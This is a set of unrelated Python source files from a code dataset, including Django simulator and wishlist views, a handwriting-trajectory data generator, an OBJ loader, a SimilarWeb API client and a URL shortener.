'stateclass_{timestep}.png'.format(timestep=self.timestep))\n\n response = HttpResponse(content_type=\"image/png\")\n image = Image.open(image_path)\n image.save(response, 'PNG')\n return response\n\n\nclass STSimSpatialRunnerView(View):\n\n def __init__(self):\n\n self.scenario_id = None\n self.project_id = None\n super().__init__()\n\n def post(self, request, *args, **kwargs):\n\n # TODO - setup an interface to set this via. Include this as ajax'd data into the view.\n run_config = {\n 'min_step': 0,\n 'max_step': 20,\n 'step_size': 1,\n }\n\n # set the run control for the spatial model\n spatial_stsim.update_run_control(\n sid=self.scenario_id, working_path=default_run_control_path,\n spatial=True, iterations=0, start_timestep=0, end_timestep=20\n )\n\n spatial_stsim.set_output_options(self.scenario_id, default_run_control_path,\n SummaryOutputSC=True, SummaryOutputSCTimesteps=1,\n SummaryOutputTR=True, SummaryOutputTRTimesteps=1,\n RasterOutputSC=True, RasterOutputSCTimesteps=1)\n\n # run spatial stsim model at self.scenario_id\n result_scenario_id = spatial_stsim.run_model(sid=self.scenario_id)\n run_config['result_scenario_id'] = result_scenario_id\n\n # process each output raster in the output directory\n stateclass_definitions = spatial_stsim.export_stateclass_definitions(\n pid=self.project_id,\n working_path=default_sc_path,\n orig=True\n )\n\n texture_utils.process_stateclass_directory(\n dir_path=os.path.join(spatial_stsim.lib + '.output', 'Scenario-'+str(result_scenario_id), 'Spatial'),\n sc_defs=stateclass_definitions\n )\n\n # Return the completed spatial run id, and use that ID for obtaining the resulting output timesteps' rasters\n return JsonResponse({'data': run_config})\n\n def dispatch(self, request, *args, **kwargs):\n self.scenario_id = kwargs.get('scenario_id')\n self.project_id = kwargs.get('project_id')\n return super(STSimSpatialRunnerView, self).dispatch(request, *args, **kwargs)\n\n\nclass STSimRunnerView(View):\n\n def __init__(self):\n\n self.sid = None\n super().__init__()\n\n def post(self, request, *args, **kwargs):\n values_dict = json.loads(request.POST['veg_slider_values_state_class'])\n if 'probabilistic_transitions_slider_values' in request.POST:\n transitions_dict = json.loads(request.POST['probabilistic_transitions_slider_values'])\n else:\n transitions_dict = None\n return HttpResponse(json.dumps(run_st_sim(self.sid, values_dict, transitions_dict)))\n\n def dispatch(self, request, *args, **kwargs):\n self.sid = kwargs.get('scenario_id')\n return super(STSimRunnerView, self).dispatch(request, *args, **kwargs)\n\n\ndef run_st_sim(st_scenario, veg_slider_values_state_class_dict, probabilistic_transitions_slider_values_dict=None):\n\n # working file path\n st_model_init_conditions_file = os.path.join(settings.ST_SIM_WORKING_DIR,\n \"initial_conditions\",\n \"user_defined_temp\" + str(time.time()) + \".csv\")\n\n # initial PVT\n stsim.import_nonspatial_distribution(sid=st_scenario,\n values_dict=veg_slider_values_state_class_dict,\n working_path=st_model_init_conditions_file)\n\n # probabilistic transition probabilities\n default_probabilities = stsim.export_probabilistic_transitions_map(\n sid=default_sid,\n transitions_path=st_model_init_conditions_file,\n orig=True)\n\n if probabilistic_transitions_slider_values_dict is not None and len(probabilistic_transitions_slider_values_dict.keys()) > 0:\n user_probabilities = default_probabilities\n # adjust the values of the default probabilites\n for veg_type in user_probabilities.keys():\n for state_class in user_probabilities[veg_type]:\n transition_type = state_class['type']\n if transition_type in probabilistic_transitions_slider_values_dict.keys():\n value = probabilistic_transitions_slider_values_dict[transition_type]\n state_class['probability'] += value\n\n stsim.import_probabilistic_transitions(sid=st_scenario,\n values_dict=user_probabilities,\n working_path=st_model_init_conditions_file)\n else:\n # use default probabilities\n stsim.import_probabilistic_transitions(sid=st_scenario,\n values_dict=default_probabilities,\n working_path=st_model_init_conditions_file)\n\n # run model and collect results\n st_model_output_sid = stsim.run_model(st_scenario)\n st_model_results_dir = os.path.join(settings.ST_SIM_WORKING_DIR, \"model_results\")\n st_model_output_file = os.path.join(st_model_results_dir, \"stateclass-summary-\" + st_model_output_sid + \".csv\")\n results_json = json.dumps(stsim.export_stateclass_summary(sid=st_model_output_sid,\n report_path=st_model_output_file))\n return {'results_json': results_json}\n","sub_path":"ST_Sim_Landscape_Simulator/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"486303617","text":"import numpy as np\nfrom scipy.interpolate import interp1d\nimport matplotlib.pyplot as plt\nimport copy\n\ndataType = \"raw500\" #raw500, nor100\ntrain_len = 20000 \ntest_len = 4000\ndata_form =\"direct2\" #point, direct, direct2\npadding = 100 #if nor100, 200(but direct2 must be 200/2) \ninterpo = 1000 #200 or any\nway = \"interpo\" #padding, interpo\n\n# raw500,point形式的話不要用zeropadding\n\nif(dataType == \"raw500\"):\n point_data = np.loadtxt('pendigits/ori/train_data.out')\n target_data = np.loadtxt('pendigits/ori/train_target.out')[: , np.newaxis]\n point_data_test = np.loadtxt('pendigits/ori/test_data.out')\n target_data_test = np.loadtxt('pendigits/ori/test_target.out')[: , np.newaxis]\nelif(dataType == \"nor100\"):\n point_data = np.loadtxt('pendigits/in_train.txt')\n target_data = np.loadtxt('pendigits/out_train.txt')[: , np.newaxis]\n point_data_test = np.loadtxt('pendigits/in_test.txt')\n target_data_test = np.loadtxt('pendigits/out_test.txt')[: , np.newaxis]\n\ndef interpolation(values, count, data_form=\"point\"):\n if(data_form == \"direct\" or data_form == \"direct2\"):\n count+=2\n \n px=values[::2]\n py=values[1::2]\n \n x = np.linspace(np.min(px), np.max(px), num=px.shape[0], endpoint=True)\n fx = interp1d(x, px, kind='cubic')\n xnew = np.linspace(np.min(px), np.max(px), num=count/2, endpoint=True)\n f_x = fx(xnew)\n \n y = np.linspace(np.min(py), np.max(py), num=py.shape[0], endpoint=True)\n fy = interp1d(y, py, kind='cubic')\n ynew = np.linspace(np.min(py), np.max(py), num=count/2, endpoint=True)\n f_y = fy(ynew)\n \n result=[]\n for i in range(len(f_x)):\n result.append(f_x[i])\n result.append(f_y[i])\n \n if(data_form == \"point\"):\n return np.array(result)\n elif(data_form == \"direct\"):\n return np.array(generate_trajectory_vec(result))\n elif(data_form == \"direct2\"):\n return np.array(generate_trajectory_vec_v2(result))\n else:\n raise \"not indicate form\"\n\ndef zeropadding(trajectory, n, data_form=\"point\"):\n if(len(trajectory)==n):\n if(data_form == \"point\"):\n return trajectory\n elif(data_form == \"direct\"):\n return np.array(generate_trajectory_vec(trajectory))\n elif(data_form == \"direct2\"):\n return np.array(generate_trajectory_vec_v2(trajectory))\n else:\n raise \"not indicate form\"\n else:\n if(data_form == \"point\"):\n trajectory = trajectory\n elif(data_form == \"direct\"):\n trajectory = np.array(generate_trajectory_vec(trajectory))\n elif(data_form == \"direct2\"):\n trajectory = np.array(generate_trajectory_vec_v2(trajectory))\n else:\n raise \"not indicate form\"\n \n npad = n - len(trajectory)\n B = np.pad(trajectory, pad_width=npad, mode='constant', constant_values=0)[npad:]\n return B\n\ndef generate_trajectory_vec(trajectory):\n x = trajectory[::2]\n y = trajectory[1::2]\n new_traject=[]\n for i in range(len(x)-1):\n new_traject.append(x[i+1]-x[i])\n new_traject.append(y[i+1]-y[i])\n return new_traject\n\ndef generate_trajectory_vec_v2(trajectory):\n x = trajectory[::2]\n y = trajectory[1::2]\n new_traject=[]\n for i in range(len(x)-1):\n xm = x[i+1]-x[i]\n ym = y[i+1]-y[i]\n new_traject.append(direction(xm, ym))\n return new_traject\n\ndef direction(x, y):\n if(x>0):\n slope = y/x\n if(slope>0 and slope<=1):\n return 1\n if(slope>1):\n return 2\n if(slope>-1 and slope<=0):\n return 8\n if(slope<=-1):\n return 7\n elif(x<0):\n slope = y/x\n if(slope<=0 and slope>-1):\n return 4 \n if(slope<=-1):\n return 3 \n if(slope<1 and slope>=0):\n return 5\n if(slope>=1):\n return 6\n elif(x==0):\n if(y>0):\n return 2\n if(y<0):\n return 6\n if(x==0 and y==0):\n return 0\n\ndef generate_a_trajectory(train_data, target_data, n, noi=15, data_form=\"point\"):\n traject=[]\n targets=[]\n for i in range(n):\n index = np.random.randint(train_data.shape[0])\n traject.append(train_data[index])\n targets.append(int(target_data[index]))\n# trajects = [train_data[np.random.randint(train_data.shape[0])] for i in range(n)]\n trajects = copy.copy(traject)\n trajectory = []\n pre_gap=0\n pos = 0\n if(dataType == \"raw500\"):\n if(n==1):\n for j in range(int(trajects[0][-1])):\n trajectory.append(trajects[0][j])\n else:\n for i in range(n-1):\n links = []\n p0 = trajects[i]\n p1 = trajects[i+1]\n gap = 500\n p0[:-1:2]-=pre_gap\n p1[:-1:2]+= gap\n for j in range(0, int(p0[-1]), 2):\n links.append(p0[j]+pos)\n links.append(p0[j+1])\n if(i == n-2):\n for j in range(0, int(p1[-1]), 2):\n links.append(p1[j]+pos)\n links.append(p1[j+1])\n p1[:-1:2]-=gap\n trajectory.extend(links)\n pre_gap=gap\n pos+=gap\n elif(dataType == \"nor100\"):\n if(n==1):\n for j in range(int(len(trajects[0]))):\n trajectory.append(trajects[0][j])\n else:\n for i in range(n-1):\n links = []\n p0 = trajects[i]\n p1 = trajects[i+1]\n gap = 100\n p0[::2]-=pre_gap\n p1[::2]+= gap\n for j in range(0, len(p0), 2):\n links.append(p0[j]+pos)\n links.append(p0[j+1])\n #insert three noise \n p0p1x = np.abs(p0[-2]-p1[0])/3\n p0p1y = np.abs(p0[-1]-p1[1])/3\n for j in range(2):\n links.append(p0[-2]+p0p1x*(j+1)+pos)\n links.append(p0[-1]+p0p1y*(j+1))\n #insert three noise \n if(i == n-2):\n for j in range(0, len(p1), 2):\n links.append(p1[j]+pos)\n links.append(p1[j+1])\n p1[:-1:2]-=gap\n trajectory.extend(links)\n pre_gap=gap\n pos+=gap \n \n if(data_form == \"point\" or data_form == \"direct\" or data_form == \"direct2\"):\n return np.array(trajectory), np.array(targets)\n else:\n raise \"not indicate form\"\n \n################################################################################################################\n\nif(data_form == \"point\"):\n if(way == \"padding\"):\n new_point_data = np.zeros((train_len, padding)) #最長總長軌跡點個數\n new_point_data_Te = np.zeros((test_len, padding))\n elif(way == \"interpo\"):\n new_point_data = np.zeros((train_len, interpo)) #最長總長軌跡點個數\n new_point_data_Te = np.zeros((test_len, interpo))\n \nif(data_form == \"direct\" or data_form == \"direct2\"):\n if(way == \"padding\"):\n new_point_data = np.zeros((train_len, padding)) #最長總長軌跡點個數\n new_point_data_Te = np.zeros((test_len, padding))\n elif(way == \"interpo\" and data_form == \"direct\"):\n new_point_data = np.zeros((train_len, interpo)) #最長總長軌跡點個數\n new_point_data_Te = np.zeros((test_len, interpo))\n elif(way == \"interpo\" and data_form == \"direct2\"):\n new_point_data = np.zeros((train_len, interpo//2)) #最長總長軌跡點個數\n new_point_data_Te = np.zeros((test_len, interpo//2))\n \nnew_target_data = np.zeros((train_len,10,10)) #分成10張,0~9種class\nnew_target_data_Te = np.zeros((test_len,10,10)) \n\ncount=0\n#製造train dataset\nfor i in range(train_len):\n num = np.random.randint(1,11) #軌跡總共有幾個數字,1~10\n trajectory, target = generate_a_trajectory(point_data, target_data, num, 30, data_form)\n if(way==\"padding\"):\n new_point_data[i] = zeropadding(trajectory, padding, data_form)\n elif(way==\"interpo\"):\n new_point_data[i] = interpolation(trajectory, interpo, data_form)\n s_array = np.zeros((10,10)) \n for j, number in enumerate(target):\n c_array = np.zeros(10)\n c_array[number] = 1\n s_array[j] = c_array\n new_target_data[i] = s_array\n \n#製造test dataset\nfor i in range(test_len):\n num = np.random.randint(1,11) #軌跡總共有幾個數字,1~10\n trajectory, target = generate_a_trajectory(point_data_test, target_data_test, num, 30, data_form)\n if(way==\"padding\"):\n new_point_data_Te[i] = zeropadding(trajectory, padding, data_form)\n elif(way==\"interpo\"):\n new_point_data_Te[i] = interpolation(trajectory, interpo, data_form)\n s_array = np.zeros((10,10)) \n for j, number in enumerate(target):\n c_array = np.zeros(10)\n c_array[number] = 1\n s_array[j] = c_array\n new_target_data_Te[i] = s_array\n\nnp.savetxt(\"database/temp/\"+dataType+\"/\"+data_form+\"/train_data_\"+dataType+\"_\"+data_form+\"_\"+way+\".out\", new_point_data) \nnp.savetxt(\"database/temp/\"+dataType+\"/\"+data_form+\"/train_target_\"+dataType+\"_\"+data_form+\"_\"+way+\".out\", new_target_data.reshape(new_target_data.shape[0], new_target_data.shape[1]*new_target_data.shape[2])) \nnp.savetxt(\"database/temp/\"+dataType+\"/\"+data_form+\"/test_data_\"+dataType+\"_\"+data_form+\"_\"+way+\".out\", new_point_data_Te) \nnp.savetxt(\"database/temp/\"+dataType+\"/\"+data_form+\"/test_target_\"+dataType+\"_\"+data_form+\"_\"+way+\".out\", new_target_data_Te.reshape(new_target_data_Te.shape[0], new_target_data_Te.shape[1]*new_target_data_Te.shape[2])) \n\nwith open(\"database/temp/\"+dataType+\"/\"+data_form+\"/inform_\"+dataType+\"_\"+data_form+\"_\"+way+\".txt\", 'w') as file:\n file.write(dataType+'\\n')\n file.write(data_form+'\\n')\n if(way==\"padding\"):\n file.write(way+\" : \"+str(padding)+'\\n')\n elif(way==\"interpo\"): \n file.write(way+\" : \"+str(interpo)+'\\n')\n file.write('\\n')\n file.write(\"train size : \"+str(new_point_data.shape[0])+\" \"+str(new_point_data.shape[1])+'\\n')\n file.write(\"test size : \"+str(new_point_data_Te.shape[0])+\" \"+str(new_point_data_Te.shape[1]))\n \n\ndef show(data, target, ind):\n fig_size = plt.rcParams[\"figure.figsize\"]\n plt.figure(figsize=(fig_size[0], fig_size[1]))\n if(dataType==\"raw500\"):\n plt.xlim(0,5000)\n elif(dataType==\"nor100\"):\n plt.xlim(0,1000)\n plt.ylim(0,1000)\n plt.plot(data[ind][::2], data[ind][1::2], 'b-', data[ind][::2], data[ind][1::2], 'r-', label=\"trajectory\")\n for i in range(0, len(data[ind]), 2):\n if(i%20 >= 16 or (i+1)%20 >= 16):\n plt.scatter(data[ind][i], data[ind][i+1], marker='o' , c='b')\n else:\n plt.scatter(data[ind][i], data[ind][i+1], marker='o' , c='y')\n# plt.text(data[ind][i], data[ind][i+1], i)\n plt.legend()\n plt.show()\n print(np.argmax(target[ind], axis=1))\n return data[ind]\n\ndef show_v2(data):\n fig_size = plt.rcParams[\"figure.figsize\"]\n plt.figure(figsize=(fig_size[0], fig_size[1]))\n if(dataType==\"raw500\"):\n plt.xlim(0,5000)\n elif(dataType==\"nor100\"):\n plt.xlim(0,1000)\n plt.ylim(0,1000)\n plt.plot(data[::2], data[1::2], 'b-', data[::2], data[1::2], 'r-', label=\"trajectory\")\n for i in range(0, len(data), 2):\n if(i%20 >= 16 or (i+1)%20 >= 16):\n plt.scatter(data[i], data[i+1], marker='o' , c='b')\n else:\n plt.scatter(data[i], data[i+1], marker='o' , c='y')\n# plt.text(data[ind][i], data[ind][i+1], i)\n plt.legend()\n plt.show()\n return None\n\n","sub_path":"generate_trajectory3.py","file_name":"generate_trajectory3.py","file_ext":"py","file_size_in_byte":11830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"503287128","text":"##\r\n## UNIVERSIDAD DEL VALLE DE GUATEMALA\r\n## GRÁFICAS POR COMPUTADORA\r\n## SECCIÓN 20\r\n##\r\n## SR4: Flat Shading\r\n## LUIS PEDRO CUÉLLAR - 18220\r\n##\r\n\r\nclass Object(object):\r\n def __init__(self, filename):\r\n with open(filename, 'r') as file:\r\n self.lines = [line for line in file.readlines() if line.strip()]\r\n\r\n self.vertices = []\r\n self.normals = []\r\n self.texcoords = []\r\n self.faces = []\r\n\r\n self.read()\r\n\r\n def read(self):\r\n for line in self.lines:\r\n if line:\r\n prefix, value = line.split(' ', 1)\r\n\r\n if prefix == 'v': # vertices\r\n self.vertices.append(list(map(float,value.split(' '))))\r\n elif prefix == 'vn':\r\n self.normals.append(list(map(float,value.split(' '))))\r\n elif prefix == 'vt':\r\n self.texcoords.append(list(map(float,value.split(' '))))\r\n elif prefix == 'f':\r\n if \"//\" in value:\r\n self.faces.append([list(map(int,vert.split('//'))) for vert in value.split(' ')])\r\n\r\n else:\r\n self.faces.append([list(map(int,vert.split('/'))) for vert in value.split(' ')])\r\n","sub_path":"object.py","file_name":"object.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"561140818","text":"import matplotlib.pyplot as plt\n\nmyFile=open(\"a.txt\",'r')\n\naCount=0\neCount=0\niCount=0\noCount=0\nuCount=0\nyCount=0\n\nfor line in myFile:\n for word in line.split():\n current=word.lower()\n aCount=aCount+current.count('a')\n eCount=eCount+current.count('e')\n iCount=iCount+current.count('i')\n oCount=oCount+current.count('o')\n uCount=uCount+current.count('u')\n yCount=yCount+current.count('y')\n\n\nprint(aCount)\nprint(eCount)\n###\n# Data to plot\nlabels = 'Letter A', 'Letter E', 'Letter I', 'Letter O'\nsizes = [aCount, eCount, iCount, oCount]\ncolors = ['gold', 'yellowgreen', 'lightcoral', 'lightskyblue']\nexplode = (0.1, 0, 0, 0) # explode 1st slice\n \n# Plot\nplt.pie(sizes, explode=explode, labels=labels, colors=colors,\n autopct='%1.1f%%', shadow=True, startangle=140)\n \nplt.axis('equal')\nplt.show()\n\n","sub_path":"Programy na kolokwium/liczneisamoglosek/samogloski.py","file_name":"samogloski.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"365434340","text":"import urllib2\nimport json\nimport os.path\nimport persistence\nfrom memoization import persistently_memoized\n\nKEY_MANAGER_FILE_NAME = 'KeyManager.json'\nSIMILARWEB_URL_FORMAT = \"http://api.similarweb.com/Site/{domain}/v2/alsovisited?Format={format}&UserKey={key}\"\nSIMILARWEB_RESPONSE_TOP_KEY = u\"AlsoVisited\"\nSIMILARWEB_RESPONSE_URL_KEY = u\"Url\"\nSIMILARWEB_RESPONSE_SCORE_KEY = u\"Score\"\n\nclass KeyManager(object):\n USES_PER_KEY = 66\n \n def __init__(self, file_path):\n self.__file_path = file_path\n with open(file_path, 'r') as ifile:\n persistent_state = json.load(ifile)\n self.__keys = persistent_state['keys']\n self.__use_count = persistent_state['use_count']\n\n def get_key(self):\n try:\n if self.__use_count >= KeyManager.USES_PER_KEY:\n self.__keys = self.__keys[1:]\n self.__use_count = 0\n self.__use_count += 1\n return self.__keys[0]\n\n finally:\n persistent_state = {'keys': self.__keys, 'use_count': self.__use_count}\n with open(self.__file_path, 'w') as ofile:\n json.dump(persistent_state, ofile)\n\nkey_manager = KeyManager(os.path.join(persistence.persistent_cache_directory, KEY_MANAGER_FILE_NAME))\n\n@persistently_memoized\ndef get_correlated_websites(domain):\n similarweb_url = SIMILARWEB_URL_FORMAT.format(domain=domain, format=\"JSON\", key=key_manager.get_key())\n try:\n response = urllib2.urlopen(similarweb_url)\n except urllib2.HTTPError:\n return ()\n response_string = response.read()\n response_dict = json.loads(response_string)\n return tuple((entry[SIMILARWEB_RESPONSE_URL_KEY].decode('utf-8'), entry[SIMILARWEB_RESPONSE_SCORE_KEY])\n for entry in response_dict[SIMILARWEB_RESPONSE_TOP_KEY])\n","sub_path":"python/similarweb.py","file_name":"similarweb.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"612082145","text":"import os\nimport numpy as np\nimport torch\nimport torchvision.transforms as transforms\nimport torch.utils.data as data\nimport matplotlib.pyplot as plt\nfrom functions import *\nfrom sklearn.preprocessing import OneHotEncoder, LabelEncoder\nfrom sklearn.metrics import accuracy_score\nimport pandas as pd\nimport pickle\nfrom utils.utils import *\n\n# set path\ndata_path = \"/home/gjj/data/jpegs_256\" # define UCF-101 RGB data path\nframes_test_floder=\"v_ApplyEyeMakeup_g01_c01\"\naction_name_path = \"./_UCF101actions.pkl\"\nsave_model_path = \"./ResNetCRNN_ckpt/\"\n\n# use same encoder CNN saved!\nCNN_fc_hidden1, CNN_fc_hidden2 = 1024, 768\nCNN_embed_dim = 512 # latent dim extracted by 2D CNN\nres_size = 224 # ResNet image size\ndropout_p = 0.0 # dropout probability\n\n# use same decoder RNN saved!\nRNN_hidden_layers = 3\nRNN_hidden_nodes = 512\nRNN_FC_dim = 256\n\n# training parameters\nk = 101 # number of target category\nbatch_size = 40\n# Select which frame to begin & end in videos\nbegin_frame, end_frame, skip_frame = 1, 29, 1\n\n\nwith open(action_name_path, 'rb') as f:\n action_names = pickle.load(f) # load UCF101 actions names\n\n# convert labels -> category\nle = LabelEncoder()\nle.fit(action_names)\n\n\n\n# data loading parameters\nuse_cuda = torch.cuda.is_available() # check if GPU exists\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\") # use CPU or GPU\nparams = {'batch_size': batch_size, 'shuffle': True, 'num_workers': 4, 'pin_memory': True} if use_cuda else {}\n\n\ntransform = transforms.Compose([transforms.Resize([res_size, res_size]),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n\nselected_frames = np.arange(begin_frame, end_frame, skip_frame).tolist()\n\n# read single img\nsingle_data_loader=Img_trans_2_detect(data_path,frames_test_floder,selected_frames,use_transform=transform)\nsingle_data_loader.unsqueeze_(0)\n\n# reload CRNN model\ncnn_encoder = ResCNNEncoder(fc_hidden1=CNN_fc_hidden1, fc_hidden2=CNN_fc_hidden2, drop_p=dropout_p, CNN_embed_dim=CNN_embed_dim).to(device)\nrnn_decoder = DecoderRNN(CNN_embed_dim=CNN_embed_dim, h_RNN_layers=RNN_hidden_layers, h_RNN=RNN_hidden_nodes, \n h_FC_dim=RNN_FC_dim, drop_p=dropout_p, num_classes=k).to(device)\n\ncnn_encoder.load_state_dict(torch.load(os.path.join(save_model_path, 'cnn_encoder_epoch63_singleGPU.pth')))\nrnn_decoder.load_state_dict(torch.load(os.path.join(save_model_path, 'rnn_decoder_epoch63_singleGPU.pth')))\nprint('CRNN model reloaded!')\n\nt1 = torch_utils.time_synchronized()\ny_pred = CRNN_detect_prediction([cnn_encoder, rnn_decoder], device, single_data_loader)\nt2 = torch_utils.time_synchronized()\nprint('%sDone. (%.3fs)' % (\"time used is \", t2 - t1))\n\nprint(cat2labels(le,y_pred))\n\nprint('video prediction finished!')\n\n\n\n\n","sub_path":"ResNetCRNN/ResNetCRNN_detect.py","file_name":"ResNetCRNN_detect.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"153395760","text":"\"\"\"Access_key types file.\"\"\"\n\nfrom pyramid.view import view_config\nfrom pyramid.security import (\n Allow,\n Deny,\n Authenticated,\n Everyone,\n)\nfrom pyramid.settings import asbool\nfrom ..acl import (\n DELETED_ACL,\n ONLY_ADMIN_VIEW_ACL,\n OWNER_ROLE\n)\nfrom .base import (\n Item\n)\nfrom ..authentication import (\n generate_password,\n generate_user,\n CRYPT_CONTEXT,\n)\nfrom snovault import (\n collection,\n load_schema,\n)\nfrom snovault.crud_views import (\n collection_add,\n item_edit,\n)\nfrom snovault.validators import (\n validate_item_content_post,\n)\nfrom snovault.util import debug_log\nfrom snovault.types.access_key import (\n AccessKey as SnovaultAccessKey,\n access_key_add as snovault_access_key_add,\n access_key_reset_secret as snovault_access_key_reset_secret,\n access_key_view_raw as snovault_access_key_view_raw\n)\n\n\n@collection(\n name='access-keys',\n unique_key='access_key:access_key_id',\n properties={\n 'title': 'Access keys',\n 'description': 'Programmatic access keys',\n },\n acl=[\n (Allow, Authenticated, 'add'),\n (Allow, 'group.admin', 'list'),\n (Allow, 'group.read-only-admin', 'list'),\n (Allow, 'remoteuser.INDEXER', 'list'),\n (Allow, 'remoteuser.EMBED', 'list'),\n (Deny, Everyone, 'list'),\n ])\nclass AccessKey(Item, SnovaultAccessKey):\n \"\"\"AccessKey class.\"\"\"\n\n item_type = 'access_key'\n schema = load_schema('encoded:schemas/access_key.json')\n name_key = 'access_key_id'\n embedded_list = []\n\n STATUS_ACL = {\n 'current': [(Allow, OWNER_ROLE, ['view', 'edit'])] + ONLY_ADMIN_VIEW_ACL,\n 'deleted': DELETED_ACL,\n }\n\n def __ac_local_roles__(self):\n \"\"\"grab and return user as owner.\"\"\"\n owner = 'userid.%s' % self.properties['user']\n return {owner: OWNER_ROLE}\n\n class Collection(Item.Collection):\n pass\n\n\n# access keys have view permissions for update so readonly admin and the like\n# can create access keys to download files.\n@view_config(context=AccessKey.Collection, request_method='POST',\n permission='add',\n validators=[validate_item_content_post])\n@debug_log\ndef access_key_add(context, request):\n return snovault_access_key_add(context, request)\n\n\n@view_config(name='reset-secret', context=AccessKey,\n permission='add',\n request_method='POST', subpath_segments=0)\n@debug_log\ndef access_key_reset_secret(context, request):\n return snovault_access_key_reset_secret(context, request)\n\n\n@view_config(context=AccessKey, permission='view_raw', request_method='GET', name='raw')\n@debug_log\ndef access_key_view_raw(context, request):\n return snovault_access_key_view_raw(context, request)\n","sub_path":"src/encoded/types/access_key.py","file_name":"access_key.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"282750215","text":"from django.shortcuts import render, redirect\nfrom . import models\nfrom django.contrib import messages\nimport bcrypt\n\ndef index(request):\n return render(request, \"exam_app/index.html\")\n\ndef registration(request):\n result = models.User.objects.registration(request.POST)\n if result[\"status\"] == True:\n request.session[\"user_id\"] = result[\"userInfo\"].id\n request.session[\"first_name\"] = result[\"userInfo\"].first_name\n return redirect(\"/success\")\n else:\n for error in result[\"errors\"]:\n messages.warning(request, error)\n return redirect(\"/\")\n\ndef login(request):\n result=models.User.objects.login(request.POST)\n if result[\"status\"] == True:\n request.session[\"user_id\"] = result[\"userInfo\"].id\n request.session[\"first_name\"] = result[\"userInfo\"].first_name\n return redirect(\"/success\")\n else:\n for error in result[\"errors\"]:\n messages.warning(request, error)\n return redirect(\"/\")\n\ndef success(request):\n if not 'user_id' in request.session:\n return redirect(\"/\")\n\n user_wishlist = models.Item.objects.all().filter(user__id = request.session[\"user_id\"])\n items = models.Item.objects.all().exclude(user__id = request.session[\"user_id\"]).exclude(users_wishlist__id = request.session[\"user_id\"])\n added_to_wishlist = models.User.objects.all().filter(id = request.session[\"user_id\"]).values(\"wishlist__name\", \"wishlist__id\", \"wishlist__user__first_name\")\n\n # for item in added_to_wishlist:\n # print item[\"wishlist__name\"], item[\"wishlist__id\"], item[\"wishlist__user__first_name\"]\n\n\n\n # for user in users:\n # print user.first_name, user.items.name\n # user = models.User.objects.all().filter(id = request.session[\"user_id\"])[0]\n #\n # friends = user.friend.all()\n # friended_by_other = models.User.objects.all().filter(friend__id = request.session[\"user_id\"])\n #Give me the friend instance who is linked to the id of the user in session.\n\n\n context={\n \"items\" : items,\n \"user_wishlist\" : user_wishlist,\n \"added_to_wishlist\" : added_to_wishlist\n\n }\n return render(request, \"exam_app/success.html\", context)\n\ndef add_to_wishlist(request, id):\n models.User.objects.add_to_wishlist(request.POST, request.session, id)\n return redirect(\"/success\")\n\ndef remove_wishlist(request, id):\n models.User.objects.remove_wishlist(request.POST, request.session, id)\n return redirect(\"/success\")\n\ndef delete_item(request, id):\n models.User.objects.delete_item(request.POST, request.session, id)\n return redirect(\"/success\")\n\ndef view_item(request, id):\n item = models.Item.objects.all().filter(id = id)[0]\n\n other_users = models.User.objects.all().filter(wishlist__id = id)\n\n\n context={\n \"item\" : item,\n \"other_users\" : other_users\n }\n\n return render(request, \"exam_app/view_item.html\", context)\n\ndef add_item(request):\n return render(request, \"exam_app/create.html\")\n\ndef add_item_process(request):\n models.User.objects.add_item_process(request.POST, request.session)\n return redirect(\"/success\")\n\ndef logout(request):\n del request.session[\"user_id\"]\n del request.session[\"first_name\"]\n return redirect (\"/\")\n","sub_path":"apps/exam_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"631208448","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponsePermanentRedirect\nfrom django.template import Context, loader\nfrom shorties.models import Record\n\ndef index(request):\n if request.method == 'GET':\n return render(request, 'shorties/index.html')\n elif request.method == 'POST':\n rec = Record(url=request.POST['url'])\n rec.save()\n t = loader.get_template('shorties/trim.html')\n c = Context({'enc': rec.to_base64(), 'ref': request.META['HTTP_REFERER']})\n return HttpResponse(t.render(c))\ndef trimed(request):\n base64_id = request.META['PATH_INFO'].split('/')[-1]\n rec_id = Record.id_from_base64(str(base64_id))\n url = Record.objects.get(pk=rec_id).url\n protocol = 'http://' if len(url.split('://')) == 1 else ''\n return HttpResponsePermanentRedirect(protocol + url)\n","sub_path":"shorties/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"156943630","text":"#!/usr/local/bin/python3.6\n#-*-encoding:utf-8-*-\n#题目:\n#作者:luohu\n#时间:2018-09\n#目的:\ndef getopts(argv):\n\topts = {}\n\twhile argv:\n\t\tif argv[0][0] == \"-\":\n\t\t\topts[argv[0]] = argv[1]\n\t\t\targv = argv[2:]\n\t\t\t#print ('if:',argv)\n\t\telse:\n\t\t\targv = argv[1:]\n\t\t\t#print('esle:',argv)\n\treturn opts\n\nif __name__=='__main__':\n\tfrom sys import argv\n\tmyargs = getopts(argv)\n\t#if '-i' in myargs:\n\t\t#print(myargs['-i'])\n\tprint(myargs)\n","sub_path":"python_program/02.System/testargv2.py","file_name":"testargv2.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"169403288","text":"__author__ = 'zhy'\n\n\nclass Solution(object):\n @staticmethod\n def evalRPN(tokens):\n 